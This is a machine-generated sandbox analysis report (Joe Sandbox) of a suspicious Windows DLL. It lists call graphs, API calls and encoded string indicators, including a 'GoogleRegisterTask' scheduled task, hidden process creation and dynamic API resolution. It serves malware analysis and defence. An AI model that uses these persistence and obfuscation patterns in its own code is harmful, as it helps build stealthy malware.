CloseHandle CloseHandle 13941->13942 13942->13920 14812 6fe610f5 13943->14812 13947 6fe70444 ___free_lconv_mon 14 API calls 13946->13947 13948 6fe61d89 ExpandEnvironmentStringsW 13947->13948 13949 6fe63389 13948->13949 13950 6fe633bb __DllMainCRTStartup@12 13949->13950 14992 6fe638b4 13950->14992 15104 6fe63cbc 13953->15104 13955 6fe63869 __DllMainCRTStartup@12 13955->13898 13957 6fe63302 __DllMainCRTStartup@12 13956->13957 13959 6fe63308 __DllMainCRTStartup@12 13957->13959 15155 6fe634ca 13957->15155 13959->13898 15159 6fe6329b 13960->15159 13964 6fe616ca __DllMainCRTStartup@12 13963->13964 13965 6fe632d8 
__DllMainCRTStartup@12 39 API calls 13964->13965 13966 6fe6171a 13965->13966 13966->13898 13968 6fe62491 13967->13968 13969 6fe6249a 13968->13969 13970 6fe624eb 13968->13970 15180 6fe610c5 13969->15180 15184 6fe633f1 13970->15184 13978 6fe632d8 __DllMainCRTStartup@12 39 API calls 13979 6fe624c5 13978->13979 13981 6fe632d8 __DllMainCRTStartup@12 39 API calls 13979->13981 13980 6fe62519 15196 6fe61654 VariantInit 13980->15196 13983 6fe624d1 13981->13983 13985 6fe632d8 __DllMainCRTStartup@12 39 API calls 13983->13985 13984 6fe6253e 15197 6fe61654 VariantInit 13984->15197 14050 6fe624e0 13985->14050 13987 6fe62563 15198 6fe61654 VariantInit 13987->15198 13989 6fe62588 15199 6fe616a8 VariantClear 13989->15199 13990 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13991 6fe6325d 13990->13991 13991->13898 13993 6fe625fb 15200 6fe616a8 VariantClear 13993->15200 13995 6fe6260a 15201 6fe616a8 VariantClear 13995->15201 13997 6fe62619 14050->13990 15458 6fe6cd5b 14228->15458 14231 6fe62065 14233 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14231->14233 14235 6fe61fa3 14233->14235 14235->13877 14240 6fe6cd5b __DllMainCRTStartup@12 42 API calls 14241 6fe6208f ___std_exception_copy 14240->14241 15486 6fe6db99 14241->15486 14243 6fe620bb __DllMainCRTStartup@12 15489 6fe6cb0d 14243->15489 14272 6fe634ca __DllMainCRTStartup@12 39 API calls 14271->14272 14273 6fe632e7 __DllMainCRTStartup@12 14272->14273 14273->13872 14275 6fe64ade IsProcessorFeaturePresent 14274->14275 14276 6fe64add 14274->14276 14278 6fe64f19 14275->14278 14276->13879 16035 6fe64edc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14278->16035 14280 6fe64ffc 14280->13879 14282 6fe6104e __vfwprintf_l 14281->14282 14285 6fe6c76c 14282->14285 14286 6fe6c780 __vfwprintf_l 14285->14286 14291 6fe685e0 14286->14291 14292 6fe6860f 14291->14292 14293 6fe685ec 14291->14293 14298 6fe68636 14292->14298 14314 6fe683be 14292->14314 
14305 6fe6de7c 14293->14305 14295 6fe6de7c __vfwprintf_l 29 API calls 14297 6fe68607 14295->14297 14299 6fe67d4e 14297->14299 14298->14295 14298->14297 14300 6fe67d5a 14299->14300 14301 6fe68197 __vfwprintf_l 39 API calls 14300->14301 14303 6fe67d71 14300->14303 14301->14303 14302 6fe61058 14302->13878 14303->14302 14304 6fe68197 __vfwprintf_l 39 API calls 14303->14304 14304->14302 14306 6fe6de93 14305->14306 14307 6fe6de8c 14305->14307 14311 6fe6dea1 14306->14311 14329 6fe6dcd4 14306->14329 14325 6fe68151 GetLastError 14307->14325 14310 6fe6dec8 14310->14311 14332 6fe6df26 IsProcessorFeaturePresent 14310->14332 14311->14297 14313 6fe6def8 14315 6fe6840d 14314->14315 14316 6fe683ea 14314->14316 14315->14316 14320 6fe68415 __DllMainCRTStartup@12 14315->14320 14317 6fe6de7c __vfwprintf_l 29 API calls 14316->14317 14318 6fe68402 14317->14318 14319 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14318->14319 14321 6fe6853f 14319->14321 14467 6fe6a9ff 14320->14467 14321->14298 14326 6fe6816a 14325->14326 14336 6fe6f699 14326->14336 14330 6fe6dcdf GetLastError SetLastError 14329->14330 14331 6fe6dcf8 14329->14331 14330->14310 14331->14310 14333 6fe6df32 14332->14333 14461 6fe6dcfd 14333->14461 14337 6fe6f6ac 14336->14337 14341 6fe6f6b2 14336->14341 14358 6fe71930 14337->14358 14357 6fe68182 SetLastError 14341->14357 14363 6fe7196f 14341->14363 14344 6fe6f6e4 14347 6fe7196f __dosmaperr 6 API calls 14344->14347 14345 6fe6f6f9 14346 6fe7196f __dosmaperr 6 API calls 14345->14346 14349 6fe6f705 14346->14349 14348 6fe6f6f0 14347->14348 14375 6fe70444 14348->14375 14350 6fe6f718 14349->14350 14351 6fe6f709 14349->14351 14381 6fe6f299 14350->14381 14353 6fe7196f __dosmaperr 6 API calls 14351->14353 14353->14348 14356 6fe70444 ___free_lconv_mon 14 API calls 14356->14357 14357->14306 14386 6fe717ce 14358->14386 14360 6fe7194c 14361 6fe71967 TlsGetValue 14360->14361 14362 6fe71955 14360->14362 14362->14341 14364 6fe717ce __dosmaperr 5 API calls 
14363->14364 14365 6fe7198b 14364->14365 14366 6fe6f6cc 14365->14366 14367 6fe719a9 TlsSetValue 14365->14367 14366->14357 14368 6fe71658 14366->14368 14373 6fe71665 __dosmaperr 14368->14373 14369 6fe716a5 14403 6fe70431 14369->14403 14370 6fe71690 RtlAllocateHeap 14371 6fe6f6dc 14370->14371 14370->14373 14371->14344 14371->14345 14373->14369 14373->14370 14400 6fe6df8f 14373->14400 14376 6fe7044f HeapFree 14375->14376 14377 6fe70479 14375->14377 14376->14377 14378 6fe70464 GetLastError 14376->14378 14377->14357 14379 6fe70471 __dosmaperr 14378->14379 14380 6fe70431 __dosmaperr 12 API calls 14379->14380 14380->14377 14435 6fe6f12d 14381->14435 14387 6fe717fe 14386->14387 14391 6fe717fa __dosmaperr 14386->14391 14387->14391 14392 6fe71703 14387->14392 14390 6fe71818 GetProcAddress 14390->14391 14391->14360 14398 6fe71714 ___vcrt_InitializeCriticalSectionEx 14392->14398 14393 6fe717aa 14393->14390 14393->14391 14394 6fe71732 LoadLibraryExW 14395 6fe717b1 14394->14395 14396 6fe7174d GetLastError 14394->14396 14395->14393 14397 6fe717c3 FreeLibrary 14395->14397 14396->14398 14397->14393 14398->14393 14398->14394 14399 6fe71780 LoadLibraryExW 14398->14399 14399->14395 14399->14398 14406 6fe6dfbb 14400->14406 14412 6fe6f5e8 GetLastError 14403->14412 14405 6fe70436 14405->14371 14407 6fe6dfc7 __FrameHandler3::FrameUnwindToState 14406->14407 14408 6fe7351f _unexpected RtlEnterCriticalSection 14407->14408 14409 6fe6dfd2 _unexpected 14408->14409 14410 6fe6e009 __dosmaperr RtlLeaveCriticalSection 14409->14410 14411 6fe6df9a 14410->14411 14411->14373 14413 6fe6f5fe 14412->14413 14414 6fe6f604 14412->14414 14415 6fe71930 __dosmaperr 6 API calls 14413->14415 14416 6fe7196f __dosmaperr 6 API calls 14414->14416 14433 6fe6f608 SetLastError 14414->14433 14415->14414 14417 6fe6f620 14416->14417 14419 6fe71658 __dosmaperr 12 API calls 14417->14419 14417->14433 14420 6fe6f635 14419->14420 14421 6fe6f64e 14420->14421 14422 6fe6f63d 14420->14422 14424 6fe7196f __dosmaperr 6 API calls 
14421->14424 14423 6fe7196f __dosmaperr 6 API calls 14422->14423 14425 6fe6f64b 14423->14425 14426 6fe6f65a 14424->14426 14430 6fe70444 ___free_lconv_mon 12 API calls 14425->14430 14427 6fe6f675 14426->14427 14428 6fe6f65e 14426->14428 14431 6fe6f299 __dosmaperr 12 API calls 14427->14431 14429 6fe7196f __dosmaperr 6 API calls 14428->14429 14429->14425 14430->14433 14432 6fe6f680 14431->14432 14434 6fe70444 ___free_lconv_mon 12 API calls 14432->14434 14433->14405 14434->14433 14436 6fe6f139 __FrameHandler3::FrameUnwindToState 14435->14436 14449 6fe7351f RtlEnterCriticalSection 14436->14449 14438 6fe6f143 14450 6fe6f173 14438->14450 14441 6fe6f23f 14442 6fe6f24b __FrameHandler3::FrameUnwindToState 14441->14442 14453 6fe7351f RtlEnterCriticalSection 14442->14453 14444 6fe6f255 14454 6fe6f420 14444->14454 14446 6fe6f26d 14458 6fe6f28d 14446->14458 14449->14438 14451 6fe73567 _unexpected RtlLeaveCriticalSection 14450->14451 14452 6fe6f161 14451->14452 14452->14441 14453->14444 14455 6fe6f42f __dosmaperr 14454->14455 14456 6fe6f456 __dosmaperr 14454->14456 14455->14456 14457 6fe753c5 __dosmaperr 14 API calls 14455->14457 14456->14446 14457->14456 14459 6fe73567 _unexpected RtlLeaveCriticalSection 14458->14459 14460 6fe6f27b 14459->14460 14460->14356 14462 6fe6dd19 __fread_nolock _unexpected 14461->14462 14463 6fe6dd45 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14462->14463 14465 6fe6de16 _unexpected 14463->14465 14464 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14466 6fe6de34 GetCurrentProcess TerminateProcess 14464->14466 14465->14464 14466->14313 14479 6fe6c3ce 14467->14479 14469 6fe68496 14476 6fe6a12f 14469->14476 14470 6fe6de7c __vfwprintf_l 29 API calls 14470->14469 14471 6fe6aa1f 14471->14470 14474 6fe6aa14 __DllMainCRTStartup@12 14474->14469 14474->14471 14483 6fe6a3f1 14474->14483 14486 6fe6aef1 14474->14486 14527 6fe6b71c 14474->14527 14477 6fe70444 ___free_lconv_mon 14 API calls 14476->14477 14478 
6fe6a13f 14477->14478 14478->14318 14480 6fe6c3d9 14479->14480 14481 6fe6c3f2 14479->14481 14482 6fe6de7c __vfwprintf_l 29 API calls 14480->14482 14481->14474 14482->14481 14563 6fe68a8b 14483->14563 14485 6fe6a42e 14485->14474 14487 6fe6af17 14486->14487 14488 6fe6aeff 14486->14488 14489 6fe6de7c __vfwprintf_l 29 API calls 14487->14489 14492 6fe6af58 14487->14492 14490 6fe6b7b4 14488->14490 14491 6fe6b74a 14488->14491 14488->14492 14493 6fe6af4c 14489->14493 14496 6fe6b7f3 14490->14496 14497 6fe6b7b9 14490->14497 14494 6fe6b750 14491->14494 14495 6fe6b7dc 14491->14495 14492->14474 14493->14474 14498 6fe6b755 14494->14498 14499 6fe6b781 14494->14499 14615 6fe69528 14495->14615 14500 6fe6b812 14496->14500 14501 6fe6b7f8 14496->14501 14502 6fe6b7ea 14497->14502 14503 6fe6b7bb 14497->14503 14504 6fe6b809 14498->14504 14507 6fe6b75b 14498->14507 14499->14507 14513 6fe6b7a9 14499->14513 14630 6fe6c174 14500->14630 14501->14504 14508 6fe6b7fd 14501->14508 14622 6fe6c141 14502->14622 14510 6fe6b763 14503->14510 14515 6fe6b7ca 14503->14515 14626 6fe6c1fc 14504->14626 14507->14510 14512 6fe6b77c __DllMainCRTStartup@12 14507->14512 14516 6fe6b78e 14507->14516 14508->14495 14508->14513 14525 6fe6b81d __DllMainCRTStartup@12 14510->14525 14588 6fe6bdbb 14510->14588 14512->14525 14526 6fe6b9fd 14512->14526 14633 6fe6c320 14512->14633 14513->14525 14604 6fe69847 14513->14604 14515->14495 14518 6fe6b7ce 14515->14518 14516->14525 14598 6fe6bff7 14516->14598 14518->14525 14611 6fe6c09f 14518->14611 14520 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14522 6fe6bb0e 14520->14522 14522->14474 14525->14520 14526->14525 14640 6fe7124b 14526->14640 14528 6fe6b7b4 14527->14528 14529 6fe6b74a 14527->14529 14532 6fe6b7f3 14528->14532 14533 6fe6b7b9 14528->14533 14530 6fe6b750 14529->14530 14531 6fe6b7dc 14529->14531 14534 6fe6b755 14530->14534 14535 6fe6b781 14530->14535 14542 6fe69528 __DllMainCRTStartup@12 30 API calls 14531->14542 14536 6fe6b812 14532->14536 

              Control-flow Graph

              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,3089EAF1), ref: 6FE61C0B
              • _strlen.LIBCMT ref: 6FE61D30
              • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6FE61D9D
              • FindNextFileW.KERNELBASE(?,?,?,?,?,3089EAF1), ref: 6FE61FAC
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: FileFind$EnvironmentExpandFirstNextStrings_strlen
              • String ID: %s\%s$%s\%s$%s\%s$%s\*.*$-a $GoogleRegisterTask$IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7BbtB>$PT30S$s`bovb-f{f
              • API String ID: 4146766196-3364674013
              • Opcode ID: 2ef09f69e596e96de7b99643f26d60b01687fe9999c6bb1e91738f3d89748fa3
              • Instruction ID: 44b7c5314e9c6876a6fd090f3cdcbd82c15033b698428fbbc8a4217366a73b68
              • Opcode Fuzzy Hash: 2ef09f69e596e96de7b99643f26d60b01687fe9999c6bb1e91738f3d89748fa3
              • Instruction Fuzzy Hash: 45C1BE7198420DABDF21EFA4CC45BED7FB9AF06718F60402AF914DA2C1EB389654CB51

              Control-flow Graph

              APIs
                • Part of subcall function 6FE6171F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6FE6175A
                • Part of subcall function 6FE6171F: _strlen.LIBCMT ref: 6FE6177C
                • Part of subcall function 6FE6171F: GetProcAddress.KERNEL32(?), ref: 6FE617E2
                • Part of subcall function 6FE6171F: _strlen.LIBCMT ref: 6FE6180D
              • _strlen.LIBCMT ref: 6FE64460
              • GetEnvironmentVariableW.KERNEL32(?,?,00000032), ref: 6FE644CA
              • _strlen.LIBCMT ref: 6FE644F0
              • _strlen.LIBCMT ref: 6FE64571
              • _strlen.LIBCMT ref: 6FE645E8
                • Part of subcall function 6FE6192F: _strlen.LIBCMT ref: 6FE619BD
                • Part of subcall function 6FE6192F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FE874C4), ref: 6FE61A5E
              • Sleep.KERNELBASE(000005DC), ref: 6FE64654
              • Sleep.KERNELBASE(00007530), ref: 6FE6465F
              • _strlen.LIBCMT ref: 6FE64685
              • _strlen.LIBCMT ref: 6FE64706
                • Part of subcall function 6FE61B85: FindFirstFileW.KERNELBASE(?,?,?,?,?,3089EAF1), ref: 6FE61C0B
              Strings
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB, xrefs: 6FE644D0
              • %s%s, xrefs: 6FE6452F
              • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6FE64665
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6FE646E6
              • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6FE64440
              • %s%s, xrefs: 6FE64745
              • %s%s, xrefs: 6FE646C4
              • VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>, xrefs: 6FE64551
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6FE645C8
              Similarity
              • API ID: _strlen$Sleep$AddressCreateEnvironmentFileFindFirstHandleModuleProcProcessVariable
              • String ID: %s%s$%s%s$%s%s$VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
              • API String ID: 405535372-2132796354
              • Opcode ID: 7b7271c7acb1a83617d7dd1022b2b19ee3c62c0dae742cf906c7f0d0afed26df
              • Instruction ID: 3046ba41fce64d4b327e009d71c8206825713b6ddd79a6ae31d9639d0b8d10e6
              • Opcode Fuzzy Hash: 7b7271c7acb1a83617d7dd1022b2b19ee3c62c0dae742cf906c7f0d0afed26df
              • Instruction Fuzzy Hash: B1A11AB2C4024CAFDF71DBE8DC85FDD7BB9AF19208F24001AE918A7182EB3596158F55

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6FE619BD
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FE874C4), ref: 6FE61A5E
              • _strlen.LIBCMT ref: 6FE61AC4
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FE874E0), ref: 6FE61B60
              Strings
              • %s %s, xrefs: 6FE61A24
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6FE61AA4
              • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6FE6199D
              • %s %s, xrefs: 6FE61B26
              Similarity
              • API ID: CreateProcess_strlen
              • String ID: %s %s$%s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
              • API String ID: 3222040079-4228346574
              • Opcode ID: 13c46e3dc49025af4d608e690a42cabcfa5095103fb65547fa1b8daaa755b33c
              • Instruction ID: bb419dd8b932c6b7e6cfccfbbcbc925a4b4bb1c1b0062abe828f7a1d6985310a
              • Opcode Fuzzy Hash: 13c46e3dc49025af4d608e690a42cabcfa5095103fb65547fa1b8daaa755b33c
              • Instruction Fuzzy Hash: 6E513171D8024CABEB31DFE4DC41FDD7FA8AF15748F24001AE618EA1C2E7B566148B55

              Control-flow Graph

              APIs
              Similarity
              • API ID: dllmain_raw$dllmain_crt_dispatch
              • String ID:
              • API String ID: 3136044242-0
              • Opcode ID: e4b92d6dc209aadc5112f98f2f905e16d4d20f9724e1be56ca310422b948b46d
              • Instruction ID: 4e0b3992bae2371221a20d840c16b666b5be180a1f5955a7af391c6495f688f4
              • Opcode Fuzzy Hash: e4b92d6dc209aadc5112f98f2f905e16d4d20f9724e1be56ca310422b948b46d
              • Instruction Fuzzy Hash: E021BF72D8062DAFCB228F55CD50AAF3E69FF81A98B21411BF8246B350D3319D018B90

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6FE64BE9
                • Part of subcall function 6FE650D5: RtlInitializeSListHead.NTDLL(6FE86DC0), ref: 6FE650DA
              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6FE64C53
              Similarity
              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
              • String ID:
              • API String ID: 3231365870-0
              • Opcode ID: 3028e95199ef96235e5f6bee9920ce652f7a8b8c431defc53b6db68fd84b3db9
              • Instruction ID: 8a81ea3a9c337c1e26753d221442aa6712a23d048c368f11efaa9991da66a8bd
              • Opcode Fuzzy Hash: 3028e95199ef96235e5f6bee9920ce652f7a8b8c431defc53b6db68fd84b3db9
              • Instruction Fuzzy Hash: 7F218E356C470E9AEB21ABB888247983FA2AB1323CF30041FD4616B3C2DB625544D756

              Control-flow Graph

              APIs
              • RtlAllocateHeap.NTDLL(00000008,6FE61775,6FE6C75A), ref: 6FE71699
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 6881c7ab9d55a6b0d1e77cf6cd0d47342df950b8cfa1dbd3ef6a0ce2323f986f
              • Instruction ID: 1a7d8e37d25b2e0cdeb482b462f05b48b852b65628a4eaa0e479414a7d99e321
              • Opcode Fuzzy Hash: 6881c7ab9d55a6b0d1e77cf6cd0d47342df950b8cfa1dbd3ef6a0ce2323f986f
              • Instruction Fuzzy Hash: B4F0B4356447255BAB319AE68824A9B3F699F42778B384126EC14AA284DF38F411C6A1

              Control-flow Graph

              APIs
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: 04bd3f86e85efb6cfc76c75e5919b3835756a2f9ae06651e239cda1377ee7493
              • Instruction ID: ccbd3bb3cb85fc4738a451f212ee0c52770b49ea02c20f98777bc4b602656d33
              • Opcode Fuzzy Hash: 04bd3f86e85efb6cfc76c75e5919b3835756a2f9ae06651e239cda1377ee7493
              • Instruction Fuzzy Hash: D4D0127458524CEBCF41DBF4850AB8D7FEAEB0AB25F608026E514D7240D634AE05E721
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
              • Instruction ID: 8013fa1b9557c93d7e3edd25f5d64c4ebcc02f53cfd21c7a1342f4acbf043af8
              • Opcode Fuzzy Hash: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
              • Instruction Fuzzy Hash: 0D023171E012199FDB24CFA8C99069EFBF5FF49318F24826AD519E7381DB31A941CB90
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6FE653FA
              • IsDebuggerPresent.KERNEL32 ref: 6FE654C6
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FE654DF
              • UnhandledExceptionFilter.KERNEL32(?), ref: 6FE654E9
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              • Opcode ID: 9ce0bfc0883e1274f364732ec59c9b143baae46dc5d7d849423cd5f050b28d95
              • Instruction ID: e8d3abf87be884c9613e770dc3203dad03b2b98e24691a1ff4a234d995c93de5
              • Opcode Fuzzy Hash: 9ce0bfc0883e1274f364732ec59c9b143baae46dc5d7d849423cd5f050b28d95
              • Instruction Fuzzy Hash: 15310779D0532C9ADF20DFA4C849BCDBBB9AF08304F1041AAE40DAB240E7709A85CF44
              APIs
              Strings
              • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6FE61765
              • kernel32.dll, xrefs: 6FE61755
              • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6FE61887
              • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6FE617F6
              Similarity
              • API ID: AddressProc_strlen$HandleModule
              • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
              • API String ID: 3538810943-2765630095
              • Opcode ID: bcefa24b69df3bf6b2cb35e3e79e044097d6202c31b98988c83c9bcc0f5b8033
              • Instruction ID: e6bb7c394bba7d95ed02ed1c47d9eba21ba0b28642ad3200cf06b27250383cf3
              • Opcode Fuzzy Hash: bcefa24b69df3bf6b2cb35e3e79e044097d6202c31b98988c83c9bcc0f5b8033
              • Instruction Fuzzy Hash: 4361F275D4025C9FDB21DBF8DD44A9DBFB9BB1A318F34412EE854A7282DB34A9198F00
              APIs
                • Part of subcall function 6FE77FC0: CreateFileW.KERNEL32(00000000,00000000,?,6FE78322,?,?,00000000,?,6FE78322,00000000,0000000C), ref: 6FE77FDD
              • GetLastError.KERNEL32 ref: 6FE7838D
              • __dosmaperr.LIBCMT ref: 6FE78394
              • GetFileType.KERNEL32(00000000), ref: 6FE783A0
              • GetLastError.KERNEL32 ref: 6FE783AA
              • __dosmaperr.LIBCMT ref: 6FE783B3
              • CloseHandle.KERNEL32(00000000), ref: 6FE783D3
              • CloseHandle.KERNEL32(00000000), ref: 6FE78520
              • GetLastError.KERNEL32 ref: 6FE78552
              • __dosmaperr.LIBCMT ref: 6FE78559
              Strings
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: b9f1ad80d7fa68b596959e60c0dedfbb580ba0431484789a89116b446a8d1955
              • Instruction ID: 4592d689392e4496fdd5ae1996d041297ff79b53c9b98b17bf7acb56d3376ad2
              • Opcode Fuzzy Hash: b9f1ad80d7fa68b596959e60c0dedfbb580ba0431484789a89116b446a8d1955
              • Instruction Fuzzy Hash: B2A10232A086549FCF299F68D850BAE3FB2AB07328F34025DE9119F3D0DB359912CB51
              APIs
              • RtlDecodePointer.NTDLL(?), ref: 6FE7ADFC
              Strings
              Similarity
              • API ID: DecodePointer
              • String ID: acos$asin$exp$log$log10$pow$sqrt
              • API String ID: 3527080286-3064271455
              • Opcode ID: 3a80c06b723a0d61e07900415e5b6c940f94576028ae2b9c75e0b40a2023a773
              • Instruction ID: dafaef81722471d0a6efcc6faffb3633a63bda66149eb99cf70bb73e11f6cd15
              • Opcode Fuzzy Hash: 3a80c06b723a0d61e07900415e5b6c940f94576028ae2b9c75e0b40a2023a773
              • Instruction Fuzzy Hash: 77517FB098454ACBCB28AFA9D9492EDBF70FF86714F204155E460A6374CF34D562CB51
              APIs
              • type_info::operator==.LIBVCRUNTIME ref: 6FE66BF9
              • ___TypeMatch.LIBVCRUNTIME ref: 6FE66D07
              • _UnwindNestedFrames.LIBCMT ref: 6FE66E59
              • CallUnexpected.LIBVCRUNTIME ref: 6FE66E74
              Strings
              Similarity
              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2751267872-393685449
              • Opcode ID: 10c542446898b9a6bdaaa6ba17a22b964db1244e8d4012b1d28f721d036ded23
              • Instruction ID: c18c8f6020315f2227e7e9ca34105a8632121bdb5879fd430c268b6e934a0dae
              • Opcode Fuzzy Hash: 10c542446898b9a6bdaaa6ba17a22b964db1244e8d4012b1d28f721d036ded23
              • Instruction Fuzzy Hash: 77B147718A021DEFCF04DFA4D98099EBFB5FF0A318B24456AE8146F251D731EA51CB92
              APIs
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              • Opcode ID: e2c9c62fa06004c37898c9b8795d2eb2bbea6d423a12934031eb211a417338a5
              • Instruction ID: 9e0d8ea497bfda6da8af3651949c5120052943907b34f2addb1ad17b0e8fd2a0
              • Opcode Fuzzy Hash: e2c9c62fa06004c37898c9b8795d2eb2bbea6d423a12934031eb211a417338a5
              • Instruction Fuzzy Hash: AAB14772A053559FEB21CE68CC80B9EBFB5EF45314F345156EA04AF381DB76A901CBA0
              APIs
